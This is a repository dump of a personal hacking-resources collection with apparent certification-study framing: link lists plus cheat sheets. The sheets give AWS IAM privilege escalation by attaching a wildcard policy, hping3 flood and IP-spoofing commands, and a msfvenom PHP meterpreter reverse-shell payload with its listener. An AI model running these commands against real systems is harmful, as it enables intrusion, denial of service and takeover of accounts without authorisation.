├── .all-contributorsrc ├── .gitignore ├── README.md ├── bibliography-tutorials-conferences.md ├── cloud-hacking-cheat-sheets.md ├── dos-cheat-sheet.md ├── hacking-web-cheat-sheet.md ├── hacking-wireless-cheat-sheet.md ├── iot-hacking-cheat-sheets.md ├── nmap-cheat-sheet.md ├── os-distribution-virual-machines.md ├── other-links.md ├── package.json ├── session-hijacking-cheat-sheet.md ├── spoofing-network-cheat-sheet.md ├── steganography-cheat-sheet.md ├── system-hacking-cheat-sheet.md └── tools.md /.all-contributorsrc: -------------------------------------------------------------------------------- 1 | { 2 | "projectName": "hacking-cheat-sheet", 3 | "projectOwner": "Lifka", 4 | "repoType": "github", 5 | "repoHost": "https://github.com/", 6 | "files": [ 7 | "README.md" 8 | ], 9 | "imageSize": 100, 10 | "commit": true, 11 | "commitConvention": "none", 12 | "contributors": [], 13 | "contributorsPerLine": 7 14 | } 15 | -------------------------------------------------------------------------------- /.gitignore: -------------------------------------------------------------------------------- 1 | # Logs 2 | logs 3 | *.log 4 | npm-debug.log* 5 | yarn-debug.log* 6 | yarn-error.log* 7 | lerna-debug.log* 8 | 9 | # Diagnostic reports (https://nodejs.org/api/report.html) 10 | report.[0-9]*.[0-9]*.[0-9]*.[0-9]*.json 11 | 12 | # Runtime data 13 | pids 14 | *.pid 15 | *.seed 16 | *.pid.lock 17 | 18 | # Directory for instrumented libs generated by jscoverage/JSCover 19 | lib-cov 20 | 21 | # Coverage directory used by tools like istanbul 22 | coverage 23 | *.lcov 24 | 25 | # nyc test coverage 26 | .nyc_output 27 | 28 | # Grunt intermediate storage (https://gruntjs.com/creating-plugins#storing-task-files) 29 | .grunt 30 | 31 | # Bower dependency directory (https://bower.io/) 32 | bower_components 33 | 34 | # node-waf configuration 35 | .lock-wscript 36 | 37 | # Compiled binary addons (https://nodejs.org/api/addons.html) 38 | build/Release 39 | 40 | # Dependency directories 41 | node_modules/ 42 | jspm_packages/ 43 | 44 | # Snowpack dependency directory (https://snowpack.dev/) 45 | web_modules/ 46 | 47 | # TypeScript cache 48 | *.tsbuildinfo 49 | 50 | # Optional npm cache directory 51 | .npm 52 | 53 | # Optional eslint cache 54 | .eslintcache 55 | 56 | # Microbundle cache 57 | .rpt2_cache/ 58 | .rts2_cache_cjs/ 59 | .rts2_cache_es/ 60 | .rts2_cache_umd/ 61 | 62 | # Optional REPL history 63 | .node_repl_history 64 | 65 | # Output of 'npm pack' 66 | *.tgz 67 | 68 | # Yarn Integrity file 69 | .yarn-integrity 70 | 71 | # dotenv environment variables file 72 | .env 73 | .env.test 74 | 75 | # parcel-bundler cache (https://parceljs.org/) 76 | .cache 77 | .parcel-cache 78 | 79 | # Next.js build output 80 | .next 81 | out 82 | 83 | # Nuxt.js build / generate output 84 | .nuxt 85 | dist 86 | 87 | # Gatsby files 88 | .cache/ 89 | # Comment in the public line in if your project uses Gatsby and not Next.js 90 | # https://nextjs.org/blog/next-9-1#public-directory-support 91 | # public 92 | 93 | # vuepress build output 94 | .vuepress/dist 95 | 96 | # Serverless directories 97 | .serverless/ 98 | 99 | # FuseBox cache 100 | .fusebox/ 101 | 102 | # DynamoDB Local files 103 | .dynamodb/ 104 | 105 | # TernJS port file 106 | .tern-port 107 | 108 | # Stores VSCode versions used for testing VSCode extensions 109 | .vscode-test 110 | 111 | # yarn v2 112 | .yarn/cache 113 | .yarn/unplugged 114 | .yarn/build-state.yml 115 | .yarn/install-state.gz 116 | .pnp.* -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # Hacking resources and cheat sheets 2 | 3 | [![All Contributors](https://img.shields.io/badge/all_contributors-0-orange.svg?style=flat-square)](#contributors-) 4 | 5 | List of hacking utilities. Resources that I consider useful and that I have been and continue to collect during my study. 6 | 7 | ## Index 8 | 9 | * [Tools](tools.md) 10 | * [OS distributions / Virtual machines](os-distribution-virual-machines.md) 11 | * [Bibliography / Tutorials / Conferences](bibliography-tutorials-conferences.md) 12 | * [Other links](other-links.md) 13 | * Cheat sheets 14 | * [Cloud hacking cheat sheet](cloud-hacking-cheat-sheets.md) 15 | * [DoS cheat sheet](dos-cheat-sheet.md) 16 | * [Hacking web cheat sheet](hacking-web-cheat-sheet.md) 17 | * [Hacking wireless cheat sheet](hacking-wireless-cheat-sheet.md) 18 | * [Internet of Things (IoT) hacking cheat sheet](iot-hacking-cheat-sheets.md) 19 | * [NMap command cheat sheet](nmap-cheat-sheet.md) 20 | * [Session hijacking cheat sheet](session-hijacking-cheat-sheet.md) 21 | * [Spoofing networks cheat sheet](spoofing-network-cheat-sheet.md) 22 | * [Steganography cheat sheet](steganography-cheat-sheet.md) 23 | * [System hacking cheat sheet](system-hacking-cheat-sheet.md) 24 | * [Contributors](#contributors) 25 | * [License](#license) 26 | 27 | 28 | ## Contributors 29 | 30 | 31 | 32 | 33 | 34 | 35 | 36 | This repository follows the [all-contributors](https://github.com/all-contributors/all-contributors) specification. Contributions of any kind welcome! 37 | 38 | 39 | ## License 40 | 41 | © 2023 [javierizquierdovera.com](https://javierizquierdovera.com) 42 | 43 | Licensed under the [Apache License, Version 2.0](https://www.apache.org/licenses/LICENSE-2.0) ([`LICENSE-APACHE`](LICENSE-APACHE)) or the [MIT license](https://opensource.org/licenses/MIT) ([`LICENSE-MIT`](LICENSE-MIT)), at your option. 44 | 45 | `SPDX-License-Identifier: (Apache-2.0 OR MIT)` -------------------------------------------------------------------------------- /bibliography-tutorials-conferences.md: -------------------------------------------------------------------------------- 1 | ## Bibliography / Tutorials / Conferences 2 | 3 | ### Bug bounty 4 | 5 | #### Articles 6 | * [tbhm](https://github.com/jhaddix/tbhm): The Bug Hunters Methodology. 7 | 8 | #### Books 9 | * [Real-world Bug Hunting: A Field Guide to Web Hacking](https://amzn.to/3r0FQY4) 10 | 11 | #### Conferences 12 | * [DEF CON Safe Mode Red Team Village - Jason Haddix - The Bug Hunters Methodology](https://www.youtube.com/watch?v=qPlpN4BVnRY) 13 | * [Bugbounty en Español, todo lo que debes saber](https://www.youtube.com/watch?v=vLD34cGyHS8) (Spanish) 14 | 15 | 16 | 17 | --- 18 | 19 | 20 | 21 | ### Certifications 22 | 23 | #### CEH (Certified Ethical Hacker) 24 | * [CEHV9 - PRACTICE EXAM QUESTIONS WITH ANSWERS](https://yeahhub.com/cehv9-practice-exam-questions/chapter0-assessment.php) 25 | * [CEHv10 official course](https://github.com/khanhnnvn/CEHv10) 26 | * [Ethical Hacking Labs](https://github.com/Samsar4/Ethical-Hacking-Labs): This is a collection of tutorials and labs made for ethical hacking students, cybersecurity students, network and sys-admins. These tutorials accompany the materials of CEH v10 content. 27 | * [Notes for CEH v10 exam (source code)](https://github.com/g0rbe/CEH) 28 | * [Exam simulator](https://ceh.cagy.org/) 29 | 30 | ##### Books 31 | * [CEH Certified Ethical Hacker All-in-One Exam Guide](https://amzn.to/3cVbSAb) 32 | * [CEH v10 Certified Ethical Hacker Study Guide](https://amzn.to/39PD8xT) 33 | 34 | #### Miscellaneous 35 | * [skillset](https://www.skillset.com/): Practice questions for different certifications. 36 | 37 | 38 | 39 | --- 40 | 41 | 42 | 43 | ### Forensics 44 | 45 | #### Books 46 | * [Digital Forensics Workbook: Hands-on Activities in Digital Forensics](https://amzn.to/3r1PNo6) 47 | 48 | 49 | 50 | --- 51 | 52 | 53 | 54 | ### Hacking web 55 | 56 | #### Books 57 | * [The Web Application Hacker′s Handbook: Finding and Exploiting](https://amzn.to/3sB2ExI) 58 | 59 | 60 | 61 | --- 62 | 63 | 64 | 65 | ### Hacking wireless 66 | 67 | #### Papers 68 | * [Analysing WPA3's Dragonfly Handshake](https://wpa3.mathyvanhoef.com/) 69 | 70 | 71 | 72 | --- 73 | 74 | 75 | 76 | ### Internet of Things (IoT) 77 | 78 | #### Articles 79 | * [Internet of Things (IoT) Top 10](https://wiki.owasp.org/index.php/OWASP_Internet_of_Things_Project#tab=IoT_Top_10) 80 | 81 | 82 | 83 | --- 84 | 85 | 86 | 87 | ### Malwares / Reverse Engineering 88 | 89 | #### Articles 90 | * [Anatomy of a .NET Assembly – PE Headers](https://www.red-gate.com/simple-talk/blogs/anatomy-of-a-net-assembly-pe-headers/) 91 | * [An In-Depth Look into the Win32 Portable Executable File Format](https://docs.microsoft.com/en-us/archive/msdn-magazine/2002/february/inside-windows-win32-portable-executable-file-format-in-detail) 92 | * [An In-Depth Look into the Win32 Portable Executable File Format - Part 1](https://www.delphibasics.info/home/delphibasicsarticles/anin-depthlookintothewin32portableexecutablefileformat-part1) 93 | * [An Introduction to Fuzzing: Using fuzzers (SPIKE) to find vulnerabilities](https://resources.infosecinstitute.com/topic/intro-to-fuzzing/) 94 | * [Antivirus-Artifacts](https://github.com/D3VI5H4/Antivirus-Artifacts): Anti-virus artifacts. Listing APIs hooked by: Avira, BitDefender, F-Secure, MalwareBytes, Norton, TrendMicro, and WebRoot. 95 | * [APTnotes](https://github.com/kbandla/APTnotes): Various public documents, whitepapers and articles about APT campaigns. 96 | * [Axial - Community Papers](https://ax1al.com/community_papers.html): Papers about malwares and reverse engineering. 97 | * [Basics of Windows shellcode writing](https://idafchev.github.io/exploit/2017/09/26/writing_windows_shellcode.html) 98 | * ['CRYPTERS': PRACTICANDO LA TÉCNICA DSPLIT/AVFUCKER](http://www.securitybydefault.com/2013/09/crypters-practicando-la-tecnica.html) (Spanish) 99 | * [corkami: Abusing File Formats, CharSets, Initial registers values under Windows, Initial registers values under Windows,...](https://github.com/corkami/docs) 100 | * [Introducing the TypeRefHash (TRH) (.NET)](https://www.gdatasoftware.com/blog/2020/06/36164-introducing-the-typerefhash-trh) 101 | * [Machine Learning for Malware Detection by Kaspersky](https://media.kaspersky.com/en/enterprise-security/Kaspersky-Lab-Whitepaper-Machine-Learning.pdf) 102 | * [MalwareAnalysis.co Publications](https://malwareanalysis.co/publications/) 103 | * [Malware-analysis-and-Reverse-engineering](https://github.com/Dump-GUY/Malware-analysis-and-Reverse-engineering): Some of my publicly available Malware analysis and Reverse engineering. 104 | * [Macro Malware Again](https://www.cyberfox.blog/macro-malware-again/) 105 | * [Malware researcher’s handbook (demystifying PE file)](https://resources.infosecinstitute.com/topic/2-malware-researchers-handbook-demystifying-pe-file/) 106 | * [PeStudio Standard](https://medium.com/@aubsec/pestudio-standard-f2ada4e8564) 107 | * [Reverse Engineering Malicious Macros for Fun & Profit](https://jhalon.github.io/re-malicious-macros/) 108 | * [Reverse engineering tools for .NET applications](https://pelock.medium.com/reverse-engineering-tools-for-net-applications-a28275f185b4) 109 | * [richprint](https://github.com/dishather/richprint#readme): Print compiler information stored in Rich Header of PE executables. 110 | * [Shikata Ga Nai Encoder Still Going Strong](https://www.fireeye.com/blog/threat-research/2019/10/shikata-ga-nai-encoder-still-going-strong.html) 111 | * [The .NET File Format](https://www.codeproject.com/Articles/12585/The-NET-File-Format) 112 | * [Todo lo que quisiste saber sobre las DLL y no te atreviste a preguntar](https://geeks.ms/rfog/2009/06/29/todo-lo-que-quisiste-saber-sobre-las-dll-y-no-te-atreviste-a-preguntar-i/) (Spanish) 113 | * [vx-underground papers](https://vx-underground.org/papers.html) 114 | * [Win64/Expiro: virus multiplataforma altamente versátil e infeccioso](https://www.welivesecurity.com/la-es/2013/08/08/win64expiro-virus-multiplataforma-versatil-infeccioso/) (Spanish) 115 | * [windows-syscalls](https://github.com/j00ru/windows-syscalls): Windows System Call Tables (NT/2000/XP/2003/Vista/2008/7/2012/8/10). 116 | 117 | #### Books 118 | * [Expert .NET 2.0 IL Assembler](https://www.amazon.es/gp/product/1590596463?psc=1) 119 | * [Learning Malware Analysis: Explore the concepts, tools, and techniques to analyze and investigate Windows malware](https://amzn.to/3pYSwxj) 120 | * [MalwareAnalysis.co Books](https://malwareanalysis.co/resources/books/) 121 | * [Malware Data Science: Attack, Detection, and Attribution](https://amzn.to/3aXLNzd) 122 | * [Mastering Malware Analysis: The complete malware analyst's guide to combating malicious software, APT, cybercrime, and IoT attacks](https://amzn.to/3pZJ5O9) 123 | * [Practical Binary Analysis: Build Your Own Linux Tools for Binary Instrumentation, Analysis, and Disassembly](https://amzn.to/3ssN3jK) 124 | * [Practical Malware Analysis. The Hands-On Guide to Dissecting](https://amzn.to/2NNHCgC) 125 | * [Practical Threat Intelligence and Data-Driven Threat Hunting: A hands-on guide to threat hunting with the ATT&CK™ Framework and open source tools](https://amzn.to/3hqnzzZ) 126 | * [The Art Of Mac Malware](https://taomm.org/): Books about macOS malware, written by patrick wardle. 127 | * [The Art of Memory Forensics: Detecting Malware and Threats in Windows, Linux, and Mac Memory (Wile05)](https://amzn.to/3q76D3O) 128 | * [The IDA Pro Book: The Unofficial Guide to the World's Most Popular](https://amzn.to/3uAg0MB) 129 | 130 | #### Cheat sheets and posters 131 | * [MalwareAnalysis.co Cheat Sheets](https://malwareanalysis.co/cheat-sheets/) 132 | * [PE Format Poster](http://www.openrce.org/reference_library/files/reference/PE%20Format.pdf) 133 | * [PE Format Poster](https://github.com/corkami/pics/blob/master/binary/pe101/pe101.pdf) 134 | * [Intel 80x86 Assembler Code Table](http://www.jegerlehner.ch/intel/IntelCodeTable_es.pdf) (Spanish) 135 | 136 | #### Documentation 137 | * [PE Format](https://docs.microsoft.com/en-us/windows/win32/debug/pe-format) 138 | * [Windows Vista Kernel Structures](https://www.nirsoft.net/kernel_struct/vista/index.html) 139 | 140 | #### Magazines 141 | * [CodeBreakers Magazine](http://index-of.es/Windows/pe/CBM_1_2_2006_Goppit_PE_Format_Reverse_Engineer_View.pdf) 142 | 143 | #### Papers 144 | * [Leveraging the PE Rich Header for Static Malware Detection and Linking](https://www.sans.org/reading-room/whitepapers/reverseengineeringmalware/paper/39045) 145 | * [PE Header Analysis for Malware Detection](https://scholarworks.sjsu.edu/etd_projects/624/) 146 | 147 | #### Tutorials 148 | * [Assembly Programming Tutorial](https://www.tutorialspoint.com/assembly_programming/index.htm) 149 | * [Debugging TLS Callbacks](https://resources.infosecinstitute.com/topic/debugging-tls-callbacks/) 150 | * [Code Survival: Debug a Compiled DLL](https://rift.stacktitan.com/code-survival-debug-compiled-dll/) 151 | * [malware_training_vol1](https://github.com/hasherezade/malware_training_vol1): Materials for Windows Malware Analysis training (volume 1) 152 | * [Malware Analysis - Wannacry](https://www.purpl3f0xsecur1ty.tech/2021/02/17/wannacry.html) 153 | * [pestudio references](https://www.winitor.com/references/) 154 | * [Reverse Engineering Analysis Lab STRRAT](https://www.jaiminton.com/reverse-engineering/strrat#) 155 | * [Reverse Engineering tutorials by Ricardo Narvaja](http://ricardonarvaja.info/) (Spanish) 156 | * [The malware analyst’s guide to aPLib decompression](https://0xc0decafe.com/malware-analysts-guide-to-aplib-decompression/) 157 | 158 | #### Videotutorials 159 | * [Analyzing Ransomware - Beginner Static Analysis](https://www.youtube.com/watch?v=9nuo-AGg4p4) 160 | * [Análisis Dinámico de Malware Parte 1 (Spanish)](https://www.youtube.com/watch?v=AWUGPxSCQ4I) 161 | * [Ange Albertini: Funky File Formats](https://www.youtube.com/watch?v=hdCs6bPM4is) 162 | * [Building a Malware Lab - Software, Hardware, Tools and Tips for Effective Malware Analysis](https://www.youtube.com/watch?v=bBvOiADXjEQ) 163 | * [CppCon 2017: James McNellis "Todo lo que siempre quisiste saber sobre las DLL"](https://www.youtube.com/watch?v=JPQWQfDhICA) 164 | * [CursoReversing](https://www.youtube.com/channel/UCPNPSP20z4FGfgMJ71VOJjw/playlists) (Spanish): YouTube channel about reverse engineering. 165 | * [CursoReversing desde cero (Ricardo Narvaja 2020)](https://www.youtube.com/watch?v=Af5pvCl0CBE) (Spanish) 166 | * [How does PDF malware work? | Malicious PDF’s Explained – What is a malicious pdf?](https://www.youtube.com/watch?v=U8xExM3ykYA) 167 | * [JNLP Dangers - Java Malware Detection & Analysis](https://www.youtube.com/watch?v=9b-I2t-uwx0) 168 | * [Malware Analysis Bootcamp - Analyzing The PE Header](https://www.youtube.com/watch?v=z0e306Jod5A) 169 | * [Process Injection](https://www.youtube.com/playlist?list=PLXm1FM6zsxpBt7vZiS9Q4-4nvybd9il3t) (Spanish) 170 | * [Reverse Engineering desde 0](https://www.youtube.com/watch?v=-9xChS3ZgvU&list=PL6RJR1V-uAbzSW9EF_5AMmt_0P7vhGa3N) (Spanish) 171 | 172 | 173 | 174 | --- 175 | 176 | 177 | 178 | ### Miscellaneous 179 | 180 | #### Articles 181 | * [Dependency Confusion: How I Hacked Into Apple, Microsoft and Dozens of Other Companies](https://medium.com/@alex.birsan/dependency-confusion-4a5d60fec610) 182 | * [index-of.es](http://index-of.es/) 183 | * [PDF Tricks](https://github.com/corkami/docs/blob/master/PDF/PDF.md) 184 | * [What Actually is Threat Hunting?](https://blogs.gartner.com/pete-shoard/whats-threat-hunting/) 185 | 186 | #### Cheat sheets 187 | * [Google dorks](https://gist.github.com/sundowndev/283efaddbcf896ab405488330d1bbc06) 188 | 189 | #### Conferences 190 | * [Cybersecurity Conferences](https://infosec-conferences.com/): Listing All Virtual Cybersecurity Conferences And Virtual Hacking Events (Worldwide). 191 | 192 | 193 | ### Networks 194 | 195 | #### Articles 196 | * [Descubre Hping3 para manipular paquetes TCP/IP y hacer ataques](https://www.redeszone.net/tutoriales/seguridad/hping3-manipular-paquetes-tcp-ip-ataques/) (Spanish) 197 | 198 | #### Cheat sheets 199 | * [Wireshark cheat sheet](https://cdn.comparitech.com/wp-content/uploads/2019/06/Wireshark-Cheat-Sheet.pdf) 200 | 201 | 202 | 203 | --- 204 | 205 | 206 | 207 | ### Programming 208 | 209 | #### Books 210 | * [Clean Code](https://amzn.to/3ktAVMI) 211 | * [Design Patterns: Elements of Reusable Object-Oriented Software](https://amzn.to/2O4TLOj) 212 | * [Head First Design Patterns (A Brain Friendly Guide)](https://amzn.to/3uGdgNE) 213 | * [Introduction to Algorithms](https://amzn.to/2ZU8myH) 214 | * [JavaScript - The Definitive Guide: Master the World's Most-Used](https://amzn.to/3sC2dn9) 215 | * [Mythical Man-Month, The: Essays on Software Engineering](https://amzn.to/3aYrRfG) 216 | * [Patterns of Enterprise Application Architecture](https://amzn.to/3pU69Oc) 217 | * [Pragmatic Programmer, The: From Journeyman to Master](https://amzn.to/3q2jfsC) 218 | * [Refactoring: Improving the Design of Existing Code](https://amzn.to/3sC2I0v) 219 | * [Refactoring JavaScript: Turning Bad Code Into Good Code](https://amzn.to/3pWdMnb) 220 | * [The Linux Programming Interface: A Linux and UNIX System](https://amzn.to/3krYZjb) 221 | * [Threat Modeling: Designing for Security](https://amzn.to/2ZZpnr4) 222 | * [Violent Python: A Cookbook for Hackers, Forensic Analysts, Penetration Testers and Security Engineers](https://amzn.to/3r0GV24) 223 | 224 | 225 | 226 | --- 227 | 228 | 229 | 230 | ### Protection 231 | 232 | #### Articles 233 | * [Awesome-CobaltStrike-Defence](https://github.com/MichaelKoczwara/Awesome-CobaltStrike-Defence): Defences against Cobalt Strike. 234 | 235 | 236 | 237 | --- 238 | 239 | 240 | 241 | ### Salesforce 242 | 243 | #### Articles 244 | * [10 Tips to Passing Security Review from Trailhead](https://partners.salesforce.com/partnerNews?id=a033A00000FtLm6QAF) 245 | 246 | #### Conferences 247 | * [Become a Salesforce security Superman! with Alba Azcona Rivas](https://www.youtube.com/watch?v=MSAurvPVPeA) 248 | * [Lightning Web Components - Episode 4 : Security and Testing](https://www.youtube.com/watch?v=R7j8dDzsPho) 249 | 250 | #### Documentation 251 | * [AppExchange Security Review](https://developer.salesforce.com/docs/atlas.en-us.packagingGuide.meta/packagingGuide/security_review_overview.htm) 252 | * [Checkmarx: Setting Up the Visual Studio Code Extension Plugin](https://checkmarx.atlassian.net/wiki/spaces/SD/pages/1759216424/Setting+Up+the+Visual+Studio+Code+Extension+Plugin) 253 | * [Salesforce Security Basics](https://developer.salesforce.com/docs/atlas.en-us.securityImplGuide.meta/securityImplGuide/overview_security.htm) 254 | * [Salesforce Security Guide](https://developer.salesforce.com/docs/atlas.en-us.securityImplGuide.meta/securityImplGuide/salesforce_security_guide.htm) 255 | 256 | #### Trailheads 257 | * [AppExchange Security Review](https://trailhead.salesforce.com/content/learn/modules/isv_security_review) 258 | * [Protect Your Salesforce Data](https://trailhead.salesforce.com/content/learn/trails/security) 259 | 260 | 261 | 262 | --- 263 | 264 | 265 | 266 | ### Social engineering 267 | 268 | #### Articles 269 | * [4 new and devious phishing techniques with example phishing emails](https://fractionalciso.com/4-new-and-devious-phishing-techniques-with-example-phishing-emails/) 270 | 271 | #### Books 272 | * [Ingeniería social. El arte del hacking personal](https://amzn.to/3aYSxNp) (Spanish) 273 | * [Social Engineering: The Science of Human Hacking](https://amzn.to/2NBFJDX) 274 | 275 | #### Conferences 276 | * [Ingeniería Social, el verdadero poder seguridad informática phishing ciberseguridad](https://www.youtube.com/watch?v=qyJsBjvw2dc&t=1707s) (Spanish) 277 | 278 | 279 | 280 | --- 281 | 282 | 283 | 284 | ### System hacking 285 | 286 | #### Articles 287 | * [CTFs. Otra perspectiva del hacking.](https://derechodelared.com/ctfs-hacking/) (Spanish) 288 | * [Identifying Named Pipe Impersonation and Other Malicious Privilege Escalation Techniques](https://securityintelligence.com/identifying-named-pipe-impersonation-and-other-malicious-privilege-escalation-techniques/) 289 | * [Learning Linux Kernel Exploitation - Part 1](https://lkmidas.github.io/posts/20210123-linux-kernel-pwn-part-1/) 290 | 291 | #### Cheat sheet 292 | * [Beacon](https://github.com/HarmJ0y/CheatSheets/blob/master/Beacon.pdf) 293 | * [Burp Suite](https://derechodelared.com/burp-suite-cheat-sheet/) 294 | * [Empire](https://github.com/HarmJ0y/CheatSheets/blob/master/Empire.pdf) 295 | * [PowerSploit](https://github.com/HarmJ0y/CheatSheets/blob/master/PowerSploit.pdf) 296 | * [PowerUp](https://github.com/HarmJ0y/CheatSheets/blob/master/PowerUp.pdf) 297 | * [PowerView](https://github.com/HarmJ0y/CheatSheets/blob/master/PowerView.pdf) 298 | 299 | #### Tutorials 300 | * [PowerUp: A Usage Guide](https://www.harmj0y.net/blog/powershell/powerup-a-usage-guide/) 301 | 302 | #### Books 303 | * [Rtfm: Red Team Field Manua](https://amzn.to/3pW8et7) 304 | 305 | 306 | [<- Back to index](README.md) 307 | 308 | --- 309 | ## License 310 | 311 | © 2023 [javierizquierdovera.com](https://javierizquierdovera.com) 312 | 313 | Licensed under the [Apache License, Version 2.0](https://www.apache.org/licenses/LICENSE-2.0) ([`LICENSE-APACHE`](LICENSE-APACHE)) or the [MIT license](https://opensource.org/licenses/MIT) ([`LICENSE-MIT`](LICENSE-MIT)), at your option. 314 | 315 | `SPDX-License-Identifier: (Apache-2.0 OR MIT)` 316 | -------------------------------------------------------------------------------- /cloud-hacking-cheat-sheets.md: -------------------------------------------------------------------------------- 1 | ## Cloud hacking cheat sheet 2 | 3 | ### Amazon 4 | 5 | #### Install awscli 6 | ```sh 7 | pip3 install awscli 8 | ``` 9 | 10 | #### S3 Bucket Enumeration 11 | 12 | ##### Search for public buckets from a company using lazys3 13 | ```sh 14 | ruby lazys3.rb [COMPANY] 15 | ``` 16 | ##### Search for public buckets from a company using s3scanner 17 | ```sh 18 | python3 ./s3scanner.py sites.txt 19 | ``` 20 | 21 | ##### Dump all open buckets and log both open and closed buckets using s3scanner 22 | ```sh 23 | python3 ./s3scanner.py --include-closed --out-file found.txt --dump names.txt 24 | ``` 25 | 26 | ##### Save the file listings of all open buckets to a file using s3scanner 27 | ```sh 28 | python ./s3scanner.py --list names.txt 29 | ``` 30 | 31 | #### Escalate IAM User Privileges by Exploiting Misconfigured User Policy 32 | ```sh 33 | vim user-policy.json 34 | ``` 35 | 36 | Insert: 37 | ```sh 38 | { 39 | "Version": "2011-09-11", 40 | "Statement": [ 41 | { 42 | 43 | "Effect": "Allow", 44 | 45 | "Action": "*", 46 | 47 | "Resource": "*" 48 | 49 | } 50 | ] 51 | } 52 | ``` 53 | 54 | Attach the created policy (user-policy) to the target IAM user’s account: 55 | 56 | ```sh 57 | aws iam create-policy --policy-name user-policy --policy-document file://user-policy.json 58 | 59 | aws iam attach-user-policy --user-name [Target Username] --policy-arn arn:aws:iam::[Account ID]:policy/user-policy 60 | ``` 61 | 62 | #### View user policies 63 | ```sh 64 | aws iam list-attached-user-policies --user-name [Target Username] 65 | ``` 66 | 67 | #### List users 68 | ```sh 69 | aws iam list-users 70 | ``` 71 | 72 | #### List buckets 73 | ```sh 74 | aws s3api list-buckets --query "Buckets[].Name" 75 | ``` 76 | 77 | #### List user policies 78 | ```sh 79 | aws iam list-user-policies 80 | ``` 81 | 82 | #### List role policies 83 | ```sh 84 | aws iam list-role-policies 85 | ``` 86 | 87 | #### List froup policies 88 | ```sh 89 | aws iam list-group-policies 90 | ``` 91 | 92 | #### Create user 93 | ```sh 94 | aws iam create-user 95 | ``` 96 | 97 | 98 | 99 | [<- Back to index](README.md) 100 | 101 | --- 102 | ## License 103 | 104 | © 2023 [javierizquierdovera.com](https://javierizquierdovera.com) 105 | 106 | Licensed under the [Apache License, Version 2.0](https://www.apache.org/licenses/LICENSE-2.0) ([`LICENSE-APACHE`](LICENSE-APACHE)) or the [MIT license](https://opensource.org/licenses/MIT) ([`LICENSE-MIT`](LICENSE-MIT)), at your option. 107 | 108 | `SPDX-License-Identifier: (Apache-2.0 OR MIT)` -------------------------------------------------------------------------------- /dos-cheat-sheet.md: -------------------------------------------------------------------------------- 1 | ## DoS cheat sheet 2 | 3 | ### SYN Flooding 4 | SYN flooding takes advantage of a flaw with regard to how most hosts implement the TCP three-way handshake. This attack occurs when the intruder sends unlimited SYN packets (requests) to the host system. The process of transmitting such packets is faster than the system can handle. Normally, the connection establishes with the TCP three-way handshake, and the host keeps track of the partially open connections while waiting in a listening queue for response ACK packets. 5 | 6 | #### Using Metasploit 7 | 8 | ```sh 9 | msfconsole 10 | use auxiliary/dos/tcp/synflood 11 | ``` 12 | 13 | ### PoD attack 14 | The attacker tries to crash, freeze, or destabilize the targeted system or service by sending malformed or oversized packets using a simple ping command. 15 | 16 | #### Using hping3 17 | 18 | ```sh 19 | hping3 --d 65538 -S -p 21 --flood [Target IP] 20 | ``` 21 | -d: Specifies data size. 22 | 23 | -S: Sets the SYN flag. 24 | 25 | -p: Specifies the destination port. 26 | 27 | --flood: Sends a huge number of packets. 28 | 29 | ### Spoof source IP 30 | 31 | #### Using hping3 32 | 33 | ```sh 34 | hping3 -S [Target IP] -a [IP Spoofed] 35 | ``` 36 | -S: Sets the SYN flag. 37 | 38 | -a: Spoofs the IP address. 39 | 40 | -p: Specifies the destination port. 41 | 42 | --flood: Sends a huge number of packets. 43 | 44 | 45 | ### UDP application layer flood attack 46 | 47 | #### Using hping3 48 | 49 | ```sh 50 | hping3 -2 -p 139 --flood [Target IP] 51 | ``` 52 | -2: Specifies the UDP mode. 53 | 54 | -p: Specifies the destination port. 55 | 56 | --flood: Sends a huge number of packets. 57 | 58 | 59 | [<- Back to index](README.md) 60 | 61 | --- 62 | ## License 63 | 64 | © 2023 [javierizquierdovera.com](https://javierizquierdovera.com) 65 | 66 | Licensed under the [Apache License, Version 2.0](https://www.apache.org/licenses/LICENSE-2.0) ([`LICENSE-APACHE`](LICENSE-APACHE)) or the [MIT license](https://opensource.org/licenses/MIT) ([`LICENSE-MIT`](LICENSE-MIT)), at your option. 67 | 68 | `SPDX-License-Identifier: (Apache-2.0 OR MIT)` -------------------------------------------------------------------------------- /hacking-web-cheat-sheet.md: -------------------------------------------------------------------------------- 1 | ## Hacking web cheat sheet 2 | 3 | ### Gathering web server 4 | 5 | #### Finding default content of web server using nikto 6 | 7 | ```sh 8 | nikto -h [HOST] -Tuning x 9 | ``` 10 | 11 | #### Analyze website using skipfish 12 | 13 | ```sh 14 | skipfish -o /root/output -S /usr/share/skipfish/dictionaries/complete.wl [HOST:8080] 15 | ``` 16 | 17 | #### Discover web directories using uniscan 18 | 19 | ```sh 20 | uniscan -u [HOST] -q 21 | ``` 22 | 23 | #### Discover robots.txt and sitemap.xml files using uniscan 24 | ```sh 25 | uniscan -u [HOST] -we 26 | ``` 27 | 28 | #### Perform dynamic tests using uniscan 29 | Obtains information about emails, source code disclosures, and external hosts. 30 | 31 | ```sh 32 | uniscan -u [HOST] -d 33 | ``` 34 | 35 | #### Perform a port and service discovery scan using nmap 36 | 37 | ```sh 38 | nmap -T4 -A -v [HOST] 39 | ``` 40 | 41 | #### Perform web application reconnaissance using WhatWeb 42 | WhatWeb recognizes web technologies, such as blogging platforms, email addresses, content management systems (CMS), account IDs, statistics and analytics packages, JavaScript libraries, and embedded devices. It also identifies version numbers, web servers, web framework modules, etc. 43 | 44 | ```sh 45 | whatweb [HOST] 46 | ``` 47 | 48 | ```sh 49 | whatweb -v [HOST] 50 | ``` 51 | 52 | #### Detect Load Balancers 53 | 54 | ```sh 55 | dig [HOST] 56 | ``` 57 | ```sh 58 | lbd [HOST] 59 | ``` 60 | 61 | #### Enumerate server using nmap (applications, directories, and files) 62 | 63 | ```sh 64 | nmap -sV --script http-enum [HOST] 65 | ``` 66 | 67 | #### Fast-paced enumeration of the hidden files and directories of the target web application using Gobuster 68 | 69 | ```sh 70 | gobuster dir -u [HOST] -w [DICTIONARY] 71 | ``` 72 | 73 | ### Attack website 74 | 75 | ```sh 76 | wpscan --api-token [API Token] --url [HOST] --plugins-detection aggressive --enumerate vp 77 | ``` 78 | 79 | --enumerate vp: Specifies the enumeration of vulnerable plugins. 80 | 81 | #### Create meterpreter php payload and encode using msfvenom 82 | 83 | ```sh 84 | msfvenom -p php/meterpreter/reverse_tcp LHOST=[IP Address of Host Machine] LPORT=4444 -f raw 85 | ``` 86 | 87 | Upload and open the file in the web server... 88 | 89 | ```sh 90 | use exploit/multi/handler 91 | set payload php/meterpreter/reverse_tcp 92 | set LHOST [IP Address of Host 